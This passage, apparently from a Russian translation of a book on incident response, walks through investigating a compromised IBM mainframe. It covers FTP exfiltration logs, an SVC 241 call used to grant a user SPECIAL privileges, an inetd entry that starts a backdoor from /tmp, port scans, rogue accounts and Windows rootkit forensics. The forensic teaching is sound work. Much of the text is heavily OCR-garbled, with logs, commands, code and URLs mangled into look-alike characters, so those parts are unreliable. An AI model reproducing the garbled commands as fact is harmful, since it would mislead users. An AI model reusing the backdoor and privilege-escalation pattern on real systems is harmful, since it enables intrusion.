Вот оно! Выполнено множество РТР-соединений из локации, 
по которой мы уже заранее можем предположить, что это ІР-адрес 
рабочей станции Барни. Во время одного примечательного сеанса в 
07:00 ІІТС 13 марта были переданы данные, эквивалентные по 
размеру базе данных РАСР: 40 МБ. 


іЬ:~/НІК# дгер 

> -ЕКі " 

:2Ѳ |:21 " 

* .ТхТ 



#Тітѳ 


ІпТѳгТасѳ РгоТ. 

5гс Асісіг 

Оѳзі: Асісіг 

РаскеТ 1_епд1:Ті 

2017-03-13 

06:50:17 

ТхрѲ.0 

ТСР 

192.168.1.25:59112 

10.40.40.44:21 

76 

2017-03-13 

06:50:17 

ТхрѲ.0 

ТСР 

192.168.1.25:59112 

10.40.40.44:21 

76 

2017-03-13 

06:55:18 

ТхрѲ.0 

ТСР 

10.40.40.44:40213 

192.168.1.25:20 

926 

2017-03-13 

07:00:22 

ТхсіѲ.Ѳ 

ТСР 

192.168.1.25:59112 

10.40.40.44:21 

76 

2017-03-13 

07:00:23 

ТхрѲ.0 

ТСР 

10.40.40.44:40213 

192.168.1.25:20 

40090241 

^81 / -уу -іу 

07:37:17 

ТхрУ .0 

ІСР 

ІУ2.168.1.2Ь:ЬУ112 

-10.40.40.44:21 

У0 

2017-03-13 

07:37:19 

ТхрѲ.0 

ТСР 

192.168.1.25:59112 

10.40.40.44:21 

19 

2017-03-13 

07:37:20 

ТхрѲ.0 

ТСР 

10.40.40.44:40213 

192.168.1.25:20 

9710 

2017-03-13 

07:44:17 

ТхрѲ.0 

ТСР 

192.168.1.25:59112 

10.40.40.44:21 

19 

2017-03-13 

07:44:18 

ТхрѲ.0 

ТСР 

10.40.40.44:40213 

192.168.1.25:20 

7541 


Начинают накапливаться улики, но начальник службы 
безопасности и сисадмины отказываются смотреть в лицо фактам. 
Нам нужно довести до их сознания, что пора готовиться к худшему: 
дать команду на массовый сброс паролей, который затронет все 
филиалы компании по всей стране. 

С машины Барни больше не отправлялись никакие пакеты 
после 04:00 ІІТС 14 марта, а это время запуска того самого 
задания-нарушителя ЗОВ. По всей видимости, атакующий запустил 
свою программу, а затем исчез на несколько часов, оставив ее 
“перемалывать” данные. 


Это хорошие новости для І_ео51га1. 



Их база данных с паролями, вероятно, утекла, но большая 
часть данных по их клиентам по-прежнему остается в 
относительной безопасности на машине. 


Мы возвращаемся обратно к панели 5ЭЗР в г/ОЗ, но в этот 
раз выводим список всех заданий ЮВ, которые Барни запускал за 
последние 48 часов. Если более точно, то до 07:00 ІІТС 13 марта, 
это время, в которое, как мы думаем, он выкачал базу РАСЕ 15 : 


Х3270-4 
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202Р 2ТАТІІ2 ЛІ2РІ_АУ АІ_І_ СЬА22Е2 




І_ЖЕ 1 

-ЧЧ (ЧЧ) 


1 РРЕР I Х=* ПЕ5Т=(АІ_1_) ОЫМЕР=ВАРИЕУ 

20РТ=ТоЬI Ьуй 

ЗУ2ИАМЕ= 



ИР ЛОВИАМЕ ЛоЫБ Оіллпег 

Рг + у 

СЩеие 

с 

Роз 5АТТ 

А5уз З+аІиз 


ВАРИЕУ80 ЛОВ02730 ВАРИЕУ 

1 

РРЖТ 

А 

8ѲЧ 


ВАРНЕУ81 .ЮВѲ2741 ВАРИЕУ 

1 

РРЖТ 

А 

813 



ВАРИЕУ1А ЛОВ02742 ВАРИЕУ 

1 

РРЖТ 

А 

814 



ВАРНЕУ1А ЛОВ02743 ВАРИЕУ 

1 

РРЖТ 

А 

815 



ВАРИЕУ02 ЛОВ02744 ВАРИЕУ 

1 

РРЖТ 

А 

816 



ВАРНЕУ02 ЛОВ02745 ВАРИЕУ 

1 

РРЖТ 

А 

817 



ВАРИЕУ50 ЛОВѲ2746 ВАРИЕУ 

1 

РРЖТ 

А 

818 



ВАРИЕУ81 .ЮВѲ2747 ВАРИЕУ 

1 

РРЖТ 

А 

814 




Здесь нет никакой магии, серьезно. Нам нужно исследовать 
все отчеты о выполнении программ (ЗРООІ_) в поиске вредоносного 
кода. Мы начинаем с простого поиска по ключевым словам: 
“БРЕСІАІ.”, “АІ.ТЕК УБЕР”, “ЕХЕСІЛЕ”, “ЕХ”... и быстро находим 
подозрительные команды: 


IИЕОРМАТ10ИА1. МЕ22АСЕ2 С2ЕѴЕРІТУ = ѲѲ) 
2ѲѲ8 2278 2322 2650 


**** ЕИБ ОР МЕ22АСЕ 2ЫИМАРУ РЕРОРТ Ж*** 


РЕАБУ 

АШ ВАРИЕУ 2РЕСI А|_ 0РЕРАТІ0Н2 
РЕАБУ 
ьТТС 

ж******************************* ВОТТОМ ОР БАТА ж**##**###*#*##***###*#*###***## 


004/021 


Бинго! Этот ЗОВ, запущенный в 06:45 утра по ІІТС 
представляется самым интересным. Не углубляясь слишком сильно 


15 Мы можем отсортировать 5РООІ_ в ЗОЗР в убывающем хронологическом порядке с помощью 
команды: “ЗОНТ ЕШ-ОАТЕ О” 

















в страницы за страницами скучных данных отчетов, сосредоточимся 
на последней строке, поскольку она достаточно хорошо говорит 
сама за себя: АШ (сокращение от АИЕКІІ5ЕК) ВАКМЕУ 5РЕСІАІ.. 


Это команда, дающая Барни привилегии 5РЕСІАІ.. Если мы 
проскроллим на середину данных отчета, то найдем небольшой 
сниппет ассемблера, который компилируется программой “на лету”: 


І-ОС 

ОЬІесІ Со4е 

А44г1 

А44г2 

З+ті 

Зоигсе З+а+етеп! 

ооооѳѳ 



ОѲОѲО 

ѲѲѲЯѲ 

1 

СЗЕСТ 






2 

АМОБЕ 31 

ОѲО0ѲО 

ЯОЕС 

БООС 


0ОѲ0С 

3 

5ТМ 14,12,12(13) 

000004 

05С0 




4 

ВА1_К 12,0 



Р: С 

0Ѳ0Ѳ6 


5 

ІІЗШС *, 1 2 

000006 

50Б0 

СѲ46 


ѲО04С 

6 

5Т 13, ЗАѴЕ+4 

ОѲО0ОА 

41 Б0 

С042 


Ѳ0Ѳ48 

7 

* 

ЕА 13, ЗАѴЕ 

00000Е 

ѲАЕ0 




0 

ЗѴС 241 






10 

МОБЕЗЕТ КЕТ=2ЕР0,М00Е=ЗиР 






11 +* 

пнсуа і ь т-з оі 

000010 





13+ 

СИОР 0,4 

000010 

4510 

СѲ12 


О0Ѳ1 8 

14+ 

ВА1_ 1,н<+8 


Администратор мэйнфрейма изучает программу, замирает на 
несколько секунд, затем резко зовет своего начальника службы 
безопасности, чтобы собрать экстренное совещание. Он поясняет, 
что программа 5ѴС 241 автоматически выдает ее вызывающему 
полномочное состояние (режим ядра). 

По достижении этого состояния программа оказывается 
способна делать в мэйнфрейме практически все, что угодно - в 
данном случае, к примеру, выдать Барни атрибут 5РЕСІАІ.. Хуже 
всего, что 5ѴС 241 - это совершенно легитимная функция, которая 
необходима для банковского приложения, которое они 
используют... 

**Примечание по вызовам супервизора (5ѴС)** 

ЗѴС в мэйнфреймах - это аналог системных вызовов на 
платформах типа ІІпіх и ѴѴіпсІоѵѵз. Они предоставляют АРІ для 
доступа к режиму ядра и безопасного выполнения низкоуровневых 
операций. 



Допустим, вы хотите прочитать файл на диске. Если вы 
стандартный пользователь, то вы не можете напрямую читать с 
жесткого диска и получать содержимое файла, поэтому вы 
обращаетесь к системному вызову ореп, который переключает 
контекст на режим ядра, в котором он имеет неограниченные 
привилегии. 

Далее системный вызов безопасно вызывает файл и передает 
его содержимое вашему приложению в “режиме пользователя”. 

Подобные настройки ограничивают вероятность того, что 
приложение выйдет из-под контроля и разрушит соседние 
программы и данные только лишь потому, что у него есть такая 
возможность. 

Подобная концепция применяется и в мэйнфреймах. 

ЗѴС хранятся в таблице, в которой каждой функции 
присваивается уникальный номер от 0 до 255. г/ОЗ позволяет 
пользователям и вендорам регистрировать свои собственные 
функции ЗѴС. 

Принимая во внимание привилегии, которыми они обладают, 
одна небольшая ошибка может стать фатальной для системы, как в 
примере выше, где ЗѴС выдал привилегии ядра (полномочное 
состояние) целой программе, чтобы она делала все, что захочет 
без надлежащего контроля доступа. 

Эта история не придумана наугад. Она навеяна реальным 
взломом мэйнфрейма в 2012 году, когда атакующий использовал 
небрежно написанный ЗѴС для эскалации привилегий. 16 


**** 


16 И{Ь5://аИИиЬ.сот/таіп< : гатесі/Іоаіса/ЫоЬ/та5І:ег/Т1 : ѵ.5оигсе.ЬасксІоог 




Дальнейшее исследование 


Мы нашли явную улику и теперь можем уверенно составить 
хронологию заражения, учитывая все элементы, которые мы 
обнаружили: 


Хронология компрометации мэйнфрейма 






г Л 

Эскалация 

привилегий 

ч_ ^ 

Создание 

С19861 

_ > 

Г А 

Инцидент 



13 марта 


14 марта 


6:45 утра 


~3:50 утра 


/ - N 

Аккаунт 

Вагпеу 


Утечка 
базы данных 


Г 

Вредоносный 

ЗОВ 

13 марта 
5:00 утра 


13 марта 
7:00 утра 


14 марта 

4 утра 


14 марта 
6 утра 


На первом совещании с кризисной командой и советом 
директоров мы представляем данную схему в самом тихом 
помещении в истории. Вывод очевиден: все пароли в мэйнфрейме - 
а их 993 - должны быть сброшены. 

По умолчанию, НАСР хранит хэши паролей в формате 0Е5 17 , 
и учитывая небольшое количество специальных символов, которые 
разрешаются для пользователей (#, @ и &), а также отсутствие 
смешанного регистра, мы можем быть уверены в том, что 
атакующий успешно взломал все учетные записи за несколько 
часов. 


Как уже говорилось, необходимо принять это важное решение, 
поскольку все жестко-закодированные пароли в скриптах, 


17 Алгоритм хэширования, используемый в КАСР: 

ННр5://піаіпГгатегі767.іитЫг.сот/ро5І/43487158079/іНе-ІЬт-2:о5-гасГ-сІе5-Іта5І~ііпд-аІдогіІІ~іт 

















приложениях, файлах конфигурации и т.д. должны быть изменены 
вручную. Наш краткосрочный план действий по мэйнфрейму таков: 

• Отменить полномочия учетной записи С19861 

• Удалить программу 5ѴС 241 и выяснить, какое приложение ее 
разместило, чтобы сообщить об этом вендору 

• Принудительно произвести сброс паролей всех пользователей 
мэйнфрейма (но не технических учетных записей) 

• Добавить атрибут РКОТЕСТЕЭ всем техническим учетным 
записям, чтобы атакующий не мог открыть интерактивный 
сеанс даже с правильным паролем 

• Одновременно с этим найти все скрипты или приложения, 
работающие с данными учетными записями (внутри и за 
пределами мэйнфрейма), чтобы подготовить массовый сброс 
паролей 

• Увеличить детализацию логирования в ЗМР, чтобы 
учитывались изменения атрибутов, групповые соединения, 
создание учетных записей, получение успешного доступа к 
важным файлам типа 5Ѵ51.** и так далее. 

Администраторы г/ОЗ горят желанием поскорее выполнить 
эти действия, чтобы поставить точку в этой ситуации, но мы никогда 
не должны так поступать при проведении расследований! 

Может еще отправить СМС атакующему и оповестить его о 
том, что мы раскрыли его действия? 

Нет, мы не можем приступать к решению этих проблем, пока 
не найдем все бэкдоры, оставленные атакующим, которые могут 
быть использованы для восстановления контроля над системой, в 
случае если он потеряет свой текущий доступ. 

Мы займемся ликвидацией последствий на отдельном этапе, 
со всеми необходимыми мерами по предотвращению подобных 
атак в будущем. А сейчас мы идентифицируем каждый 


принадлежащий атакующему артефакт, записываем 
соответствующие краткосрочные действия, необходимые для 
остановки утечки, затем переходим к следующему артефакту. 

К слову о бэкдорах, есть два основных вида 
программ-бэкдоров, которые могут предоставлять доступ 
атакующему: 

• Обратный шелл: программа, отправляющая вызовы на 
командно-контрольный сервер и регулярно запрашивающая 
команды на выполнение. 

• Связывающий шелл: скрипт, ожидающий входящих 

соединений от атакующего. 

Бэкдор с обратным шеллом может быть легко замечен в логах 
файрвола, потому что он по своему определению всегда активен. 
Учитывая короткий промежуток времени - с момента, когда он стал 
БРЕСІАЬ 13 марта в 04:55 ІІТС и до настоящего момента - мы 
можем вручную отследить все соединения, инициированные 
мэйнфреймом, путем просмотра этих логов файрвола: 


Тіте 


ІпТегТасе 

РгоТ . 

Зге Асісіг 

РезТ Асісіг 

ЗІ2Ѳ 

2017-03-14 

02:05:17 

ТхрѲ .0 

ТСР 

10.40.40.44:59112 

10.40.40.45:1414 

276 

2017-03-14 

02:50:17 

ТхрѲ .0 

ТСР 

10.40.40.44:9812 

10.40.30.51:80 

76 

2017-03-14 

02:55:18 

ТхрѲ .0 

ТСР 

10.40.40.44:41211 

10.40.30.51:443 

926 

2017-03-14 

04:58:22 

ТхрѲ .0 

ТСР 

10.40.40.44:6718 

10.40.40.45:15000 

103 

2017-03-14 

06:12:23 

ТхрѲ .0 

ТСР 

10.40.40.44:33861 

10.210.2.118:1414 

268 

2017-03-14 

07:37:17 

ТхрѲ .0 

ТСР 

10.40.40.44:2106 

10.210.2.118:15000 

90 

2017-03-14 

08:30:19 

ТхрѲ .0 

ТСР 

10.40.40.44:28971 

10.40.40.45:1414 

19 


Мэйнфрейм - это сервер, который, как подразумевается, в 
большинстве случаев должен получать соединения, а не 
инициировать их; поэтому имеется столь небольшое количество 
подходящих вариантов (в основном, МО-сообщения, передачи по 
РТР, веб-сервисы и так далее). 

Никаких реальных паттернов не всплывает (периодические 
запросы на один и тот же ІР-адрес, запросы примерно одинакового 
размера, повторяющиеся адреса и т.д.), так что мы можем с 



уверенностью сделать вывод, что бэкдоров с обратным шеллом 
нет. 


Далее мы ищем бэкдоры, ожидающие активных соединений: 
выполняем быстрое и грязное сканирование портов мэйнфрейма 
при помощи птар, чтобы вывести список активных служб: 


:~# птар -зѴ -р- 10.40.40.44 -оА птар_зсап_таіпГгатѳ 

ЗГагГіпд Мтар 7.01 ( 1гС1:р5://птар.огд ) 

І\Ітар зсап герогС 'Гог 10.40.40.44 
НозГ із ир (0.017з ІаГепсу) . 

N01: зГюмп: 65527 сіозесі рогГз 

РОКТ ЗТАТЕ ЗЕКѴІСЕ ѴЕК5І0М 

21/Гср ореп ГГр ІВМ 05/390 ТТрй Ѵ1К10 

23/Гср ореп Гп3270 ІВМ ТеІпеГ ТМ3270 (ГгасДПопаТ. Гп3270) 

111/Гср ореп грсЬіпсІ 

443/Гср ореп ЬГГрз 

1023/Гср ореп ипкпомп 

1414/Гср ореп ипкпомп 

4020/Гср ореп ипкпомп 

5131/Гср ореп ипкпомп 


Порт 21 для РТР, 23 для ТМ3270/ТеІпеі, 111 для маппинга 
портов, 443 для НТТРЗ и 1414 для МО, но порты выше совершенно 
незнакомы сисадмину. 18 

В каждую 2/03 встроен обычный ІІІМІХ, который обрабатывает, 
в числе прочего, стек ТСР/ІР. Вот почему мы находим стандартные 
службы, такие как РТР и НТТРз в 2/03. Если там есть бэкдор, то 
вероятнее всего он находится на стороне ІІЫІХ. 

Мы подключаемся по іеіпеі к 2/03, используя учетную запись 
администратора, и выполняем стандартную команду пеіізііаі:, 
чтобы вывести список открытых портов. Сравниваем этот список с 
результатами сканирования птар, чтобы выявить любые 
отклонения, например, бэкдор, прячущийся от команды пеізѣаѣ: 


18 Во время поиска бэкдоров при помощи классического сканирования портов, не ленитесь 
подключиться к порту, чтобы подтвердить удостоверение службы, работающей на нем. 
Например, если порт 80 открыт, подключитесь с пеісаі или браузером и отправьте стандартные 
НТТР-запросы, чтобы убедиться, что служба действительно легитимная. 



5ѴЗА0М : /01І2А/е1 с : 

>пе1з1а! 






МѴЗ ТСР/ІР ИЕТЗТАТ С5 Ѵ1Р1Ѳ 

ТСРІР 

№те: ТСРІР 

12:21:58 

ІІзег ІсІ 

Сопп 

Ьосаі Зоскеі 


Рогеідп 

Зоскеі: 

31: аТ е 

МРЗС 

0Ѳ00Ѳ027 

0.0.0.0. 

.1005 


* * 


ІЮР 

РТР01 

0000000Р 

0.0.0.0. 

.21 


0.0.0.0. 

.0 

Ьізіеп 

ІМЕЮ4 

0000002Р 

0.0.0.0. 

.1023 


0.0.0.0. 

.0 

Ьізіеп 

ІМЕЮ4 

0000002Е 

0.0.0.0. 

.5131 


0.0.0.0. 

.0 

Ьізіеп 

ІМЕЮ4 

00000037 

192.168. 

1.208. 

. 22 

192.168. 

1.22..40189 

ЕзІаЬІзРі 

ЫЕТѴІЕУл/ 

00000013 

0.0.0.0. 

.4020 


0.0.0.0. 

.0 

Ьізіеп 

РОРТМАР 

0000000Е 

0.0.0.0. 

.111 


0.0.0.0. 

.0 

Ьізіеп 


С комбинацией из ІІзегЮ и номера порта админам І_ео5ігаі 
гораздо легче понять, какие приложения легитимны. С их помощью 
мы исключаем практически все службы, за исключением программ, 
которые принадлежат ІМЕЮ4. 

Как и в стандартном ІІпіх, данная программа является 
демоном, слушающим входящие соединения и направляющим их 
подходящему приложению. Факт того, что она автоматически 
запускается на старте, делает ее идеальным кандидатом на роль 
бэкдора. 

Мы просматриваем данные конфигурации ІМЕТО4, чтобы 
узнать больше о программах, которые он обслуживает: 


5Ѵ5АОМ :/ 5Ѵ5РКСЮ/еіс : > саі /еіс/іпеісІ.соіѵР 
### 

# 5ССБЮ(@(#)іпе1:с1.сопТ 1.24.1.6 АІХ) /* МогііТіесІ: 19:38:52 

9/23/91 */ 

# Іпіегпеі: зегѵег согѵРі§ига1:іоп сІаіаЬазе 

# 

[...] 

#ехес зігеат іср помаіі 0МѴ5КЕКМ /изг/зЬіп/гехессІ гехессі -ЬѴ 

іЬтсогр зігеат Іср помаіЬ 0МѴ5КЕКМ /1тр/іЬт_гип 

[] I 


Предположительно, официальная программа ІВМ, 
работающая из локации /Ітр. Это максимально подозрительно. Мы 
удостоверяемся в номере порта, связанного с этой программой, при 
помощи поиска в файле /еѣс/зегѵісез: 








5Ѵ5АОМ:/5Ѵ5РК(Ж /еТс: 

> саТ /еТс/5егѵісез 

# 



[...] 



# Апсігем 

Рііе ЗузТет АиТЬепТісаТесІ зегѵісез 

# 



ѵехес 

712/Тср 

ѵісе-ехес 

ѴІО{*ІП 

713/1:ср 

ѵісе-1о§іп 

іЬт_согр 

5131/ , Ъср 

ѵісе-5Ііе11 


Скачиваем исполняемый файл по РТР для анализа его 
содержимого. Мы не собираемся реверсить исполняемый файл для 
архитектуры 2 19 ; даже специалисты из І_ео5ігаі не обладают 
требуемыми навыками, чтобы справиться с этим. Вместо этого, 
простая команда 5І;гіп§5 должна предоставить нам достаточно 
информации для подтверждения наших подозрений: 



Стандартная функция на С ехесѵе обычно используется для 
выполнения команд, зеііиісі для переключения привилегий 
пользователя, а зоскеі: для установки соединений. Мы 
действительно имеем дело с бэкдором! Добавляем его в наш 
растущий список артефактов и движемся дальше. 

Изучаем другие модифицированные файлы в ІІЫІХ за 
последние 48 часов, чтобы обнаружить дополнительные изменения 
в системе, но помимо исполняемого файла іЬт_согр и рандомных 
файлов в файловой системе /ргос, ничто другое не выделяется. 


19 СРІІ в 2 . не на базе Іпіеі. Это проприетарные кремниевые процессоры с примерно 1100 
инструкций. Простая инструкция І_оасІ может иметь с десяток вариантов: 24-, 31- и 
64-битный режим, память-память, регистр-память, регистр-регистр и так далее. 





БѴ5А0М:/: > -ЕіпсІ / -ѣуре Т -тТіте -2 


Теперь мы фокусируем наше внимание на разделе с г/ОЗ. 
Последний очевидный вид бэкдоров, который можно поискать, это 
дополнительные учетные записи. Начинаем с обзора всех 
привилегированных пользователей в НАСР (БРЕСІАЬ и 0РЕКАТКМ5), 
используя команду 5К СІ_А55(и5ЕК). Она отображает всех 
пользователей, зарегистрированных в системе: 


БК СІ.А55(ІІ5ЕК) 

ІІ5ЕК=СѲ9111 МАМЕ=еѲ9111 СШЕК=ІВМи5ЕК СКЕАТЕ0=17.Ѳ74 
ОЕРАІЛ-Т-еКОиР=5Ѵ51 РА55ОАТЕ=17.074 РА55-ІМТЕКѴАЕ=180 

АТТКІВІЯЕ5=ОРЕКАТІ(Ж5 

КЕѴОКЕ РАТЕ=ЫОМЕ КЕБЫМЕ ^АТЕ=NОNЕ 

ЕА5Т-АССЕ55=17.074/03:30:39 

СЬАББ АІІТНОКІ2АТІОМ5=МОМЕ 


Две учетные записи С09111 и А09861 обладают привилегиями 
ОРЕКАТІСШ, и обе были созданы менее 24 часов назад. После 
общения с админом выясняется, что С09111 - это техническая 

учетная запись службы, используемая новым приложением, которое 
запустили на продакшн ночью. А09861 остается неучтенной. 

В качестве предупредительной меры, мы помечаем ее как 
подозрительную и включаем в наш краткосрочный план 
восстановления. 

Все работающие на текущий момент задания ЛЭВ 
верифицированы и одобрены системным программистом. 

Пока что все идет нормально. 

Когда мы накатим краткосрочный план восстановления через 
несколько часов (или дней), мэйнфрейм должен будет стать 
защищенным, каким был до атаки (что на деле не является 
реальным улучшением, по правде говоря, но по крайней мере дыра 
будет закрыта). 




Позже на этой неделе ІВМ проведет тщательную проверку 
целостности операционной системы, чтобы убедиться, что 
атакующий не нарушил работу внутренних компонентов. 

Затем все рабочие группы, ответственные за приложения, 
подтвердят, что их приложения не были изменены каким-либо 
образом. Представьте себе нарушение исправности 
противомошеннического приложения на машине ввиду каких-либо 
действий атакующего (преднамеренно или нет)... 

Итак, мы проверили мэйнфрейм, мы знаем, что пошло не так, 
и мы нашли виновную в инциденте программу... Думаете, это 
похоже на конец истории? 

Вовсе нет! Учетная запись Барни действительно была 
использована для несанкционированного доступа в мэйнфрейм, но 
Барни откисает в отпуске. Его учетная запись скорее всего была 
украдена каким-то образом: посредством фишинговой атаки, 
кейлоггера, сетевого перехвата... Каждый из возможных сценариев 
мрачнее предыдущего, поэтому нам нужно готовиться к худшему. 

Мы даем кризисной группе задание создать список топ-20 
критически важных бизнес-приложений, используемых в І_ео5ігаі, а 
также информацию по связанной с ними инфраструктуре (машины, 
базы данных, сетевые потоки, бизнес-партнеры и так далее). 

Учитывая уровень продвинутости, который 

продемонстрировал атакующий, нам нужно подумать о возможности 
полного отключения доступа в интернет на какое-то время. Это не 
самая простая процедура. 

Поскольку мы не хотим заменять систему на время 
расследования, мы просим сисадмина применить краткосрочные 
правила контроля доступа в механизме ЗМР на тот случай, если 


атакующий решит вернуться в то время, пока мы будем заняты 
поимкой других его бэкдоров: 

• Поднимать тревогу для любого соединения, использующего 
учетные записи Вагпеу, С19861 или А09861. 

• Поднимать тревогу для любого пакета данных, 
предназначенного для бэкдора іЬт_согр (на уровне 
файрвола). 

• Создать Иопеуроі-файлы (файлы-приманки), содержащие 
интересные ключевые слова, и поднимать тревогу при любой 
операции чтения КЕАЭ. 

• Поднимать тревогу в случае возникновения множества 
нарушений доступа. 

• Поднимать тревогу при любом входе в систему, который 
происходит не в установленное рабочее время. 


Корень зла 


"Анализ характера - это наивысшее человеческое развлечение" 

Исаак Башевис-Зингер 


Мы представляем наши выводы на совещании, тщательно 
объясняя, что хотя Барни и не виноват за инцидент персонально, 
его компьютер является предметом расследования. Поэтому, нам 
нужен незамедлительный физический доступ к его машине. 

Учитывая, что Барни в отпуске, и что политика І_ео5ігаі 
разрешает временное использование рабочих станций для личных 
целей, нам нужно проконсультироваться с юридическим и НК 
отделами перед тем, как притронуться к его компьютеру. Более 
того, доступ к любым данным, помеченным как “персональные”, 
строго запрещен и требует явного разрешения. 

Это ограничение не сильно мешает нам, потому что мы и не 
собираемся исследовать образ жизни Барни как таковой. 

Нас больше интересует обнаружение любой малвари, тайно 
шпионящей за его деятельностью. Смысл в том, что при 
проведении криминалистического анализа на персональных 
компьютерах необходимо всегда следовать законам о приватности 
и персональных данных. В противном случае, улики могут быть 
отклонены адвокатом противной стороны, и вы будете награждены 
встречным иском. 

Запланированный на несколько следующих часов порядок 
действий: 

• Собрать данные с компьютера Барни, чтобы понять, как была 

взломана его учетная запись от мэйнфрейма. 

• Запросить содействие по ѴѴіпсІоѵѵз-системам, чтобы прояснить 

архитектуру Асііѵе Эігесіогу, если это необходимо. 

Во время подготовки к сбору данных, мы наконец получаем 
информацию от админа сети. Он подходит к нам и рисует 
следующую схему на листке бумаги. Это замысловатая сетевая 
архитектура І_ео5ігаі: 



У него уходит пять минут, чтобы набросать эту банальную 
схему. Верни нам эти пять минут обратно! 

Мы хладнокровно объясняем, что нам нужно немного больше 
деталей по ней: ІР-адреса, сетевые зоны, ІР-адреса файрвола, 
свитчи, детали по всем машинам, подключенным к сети, и так 
далее. Он отвечает нам: 

“Чтобы собрать все это в кучу, у нас уйдет несколько дней. К 
тому же, большая часть нашего персонала находится в Азии, 
и мы вообще не уверены, что у них есть актуальные схемы...” 

Увы, но такая ситуация не только у І_ео5іга1. Редко у каких 
компаний есть актуальные схемы сетей для отслеживания всех их 
активов. А ведь это одни из самых важных документов, которые 
только могут быть у компании, особенно в кризисной ситуации, 
когда оперативные решения и действия имеют первостепенное 


значение. 
















Если таких документов нет, расследование по-прежнему 
можно проводить, но это однозначно станет помехой для нашей 
свободы действий, так как нам придется постоянно задавать 
вопросы локальным командам о деталях по машинам и ІР-адресам, 
к которым у нас имеются подозрения. 

Сбор артефактов 

Компьютер Барни - это машина под ѴѴіпсІоѵѵз. Мы наконец-то 
плывем по прочерченным и предсказуемым водам. Давайте снова 
достанем тот самый план игры и будем тщательно следовать 
правилам на этот раз. 

Рабочая станция все еще работает в опенспейсе по соседству 
с другими машинами. Это идеально для сбора улик, поскольку мы 
получим как непостоянные данные (память), так и постоянные 
(жесткий диск). Никто еще не вмешивался в улики. Да и как бы они 
смогли это сделать? Никто даже и не подозревал, чем занимается 
эта тихо жужжащая машина! 

При работе с потенциально зараженной машиной нам нужно 
помнить, что любой фрагмент данных, который мы получим при 
помощи локальных инструментов на машине, может быть также 
заражен. 

Если мы запустим пеѣзѣаі: для вывода списка открытых 
портов, у нас нет гарантий, что выходные данные будут 
подлинными. Атакующий мог подменить исполняемый файл 
пеізіаі, чтобы скрыть свое вредоносное программное 
обеспечение. 

Мы всегда можем проверить результирующий хэш пеізѣаѣ 
для получения гарантии его целостности, но что насчет функции 
Іп1:егпа1Се1;ТсрТаЫе(), используемой пеѣзѣаі: для получения 
информации о сети? 


Эта функция импортируется из библиотеки 
С:\МіпсІоіл»5\5у5ѣет32\ірИ1рарі.сІ11 20 , поэтому мы должны также 
проверить и ее целостность. Но опять же, эта функция полностью 
полагается на объекты ядра в памяти (_МІВ_ТСРТАВІ_Е, _МІВ_ТСРКОІлі 
и т.д.), так что нам нужно проверять и их заодно... 

Как видите, сбор необходимых для проведения 
криминалистического анализа данных быстро превращается в 
никогда непрекращающуюся регрессию ограничений, с которыми 
невозможно справиться. Это, разумеется, относится к выводу 
списка файлов, чтению содержимого, выводу списка сетевых 
соединений... практически к любой операции, которую мы 
выполняем в живой системе. 

**Примечание: режим пользователя ѵз режим ядра** 

Сейчас самое подходящее время поговорить о внутренностях 
операционной системы, а именно, ѴѴіпсІоѵѵз. 

Код, выполняемый в ѴѴіпсІоѵѵз, может работать в двух 
состояниях: режим пользователя или режим ядра. Когда 
приложение работает в пользовательском режиме, у него есть 
собственное частное виртуальное адресное пространство, которое 
оно не может покинуть. 

Оно не может заменить память другой программы, например, 
либо напрямую взаимодействовать с аппаратными компонентами. 
Оно полностью зависит от данных, получаемых через интерфейсы 
АРІ, которые предоставляются ядром, эти данные называются 
системными вызовами. 


20 ОІ_І_ - это исполняемые файлы, чьи функции могут быть вызваны из других программ. 
Например, ѵѵіпзоск.сІІІ реализует ряд функций сокетов ѴѴіпсІоѵѵз (соппесі, ЬіпсІ, Іізіеп и так 
далее), которые могут быть импортированы и использованы любой другой программой. ОІ_І_, 
используемые программой, привязываются в ее собственное виртуальное адресное 
пространство. 



Режим ядра - это самый главный режим, в котором все 
разрешено. В нем нет ограничения адресного пространства и 
вообще нет никаких ограничений. 

Программа в режиме ядра можем изменять память 
привилегированных процессов, изменять внутреннее устройство 
ѴѴіпсІоѵѵз, напрямую коммуницировать с сетевой картой, обходя 
локальный брандмауэр, читать данные напрямую с диска, обходя 
контроль доступа, и так далее. 

Это различие между режимами критически важно для 
диагностики сложности малвари и ее способности “скрывать” себя. 
Если она работает в пользовательском режиме, максимум, что она 
может делать - это подменять свое собственное пространство 
памяти, чтобы спрятать свои библиотеки ЭИ, к примеру 21 , либо 
изменять ЭИ и исполняемые файлы на диске, чтобы отображать 
ложные результаты. 

Чтобы противостоять подобному типу малвари, мы можем 
просто использовать свой собственный доверенный пеі§1:а1:.ехе 
или ехріогег.ехе, и сравнить результаты нескольких похожих 
инструментов, чтобы выявить расхождения (поэтому нам нужно 
всегда иметь ІІЗВ-флешку с классическими утилитами, чтобы 
извлекать надежные результаты). 

Малварь в режиме ядра гораздо более скрытна, поскольку она 
работает на уровне ядра операционной системы. Она может 
подменять таблицу системных вызовов для изменения результатов 
низкоуровневых функций (ореп, геасі и т.д.), заменять указатели 
таблицы дескрипторов прерываний (ЮТ), обрабатывающей 
аппаратные прерывания, заменять структуры памяти ядра и так 
далее. 


21 


И11рз://ѵѵѵѵѵѵ.аІіепѵаиІ1.сот/Ыодз/ІаЬз-гезеагсИ/таІѵѵаге-ИісІіпд-1есИпідиез-1о-ѵѵа1сІі-1 : ог-аІіепѵаи1МаЬ 




Поскольку каждая высокоуровневая функция полностью 
полагается на АРІ ядра, обнаружить хороший руткит в живой 
системе практически невозможно. Единственный надежный способ 
одолеть малварь подобного типа - это выполнить “посмертный” 
(розі-тоііет) анализ, как мы скоро узнаем. 

Малварь, которая изменяет систему, чтобы скрыть свое 
присутствие, либо присутствие другой программы, называется 
руткитом. 


**** 


Означает ли это, что нам нужно проигнорировать любые 
данные, полученные с компьютера? Определенно, нет. Они 
по-прежнему могут быть полезны, но только если мы сравниваем их 
с результатами, которые получаем при помощи более надежных 
методов, таким образом доказывая, что малварь действительно 
подделывает данные. 

Вопрос, конечно, в том, как мы можем получить достоверную 
информацию с зараженного хоста? 

Сбор форензик-улик опирается на одно мощное правило: 
“Всегда извлекай информацию, используя “сырой” доступ”. 

Хочешь вывести список файлов в директории? Не используй 
ехріогег.ехе (который может быть поврежден); вместо этого 
получи доступ к физическому диску, найди Главную файловую 
таблицу (МРТ), которая описывает организацию файлов на диске, 
затем извлекай блоки данных, связанных с заданным файлом. 

Хочешь вывести список текущих процессов? Получи прямой 
доступ в память, найди первую структуру _ЕРК0СЕ55 и вручную 


проследуй по двусвязной цепочке, чтобы выделить текущие 
работающие процессы. 22 

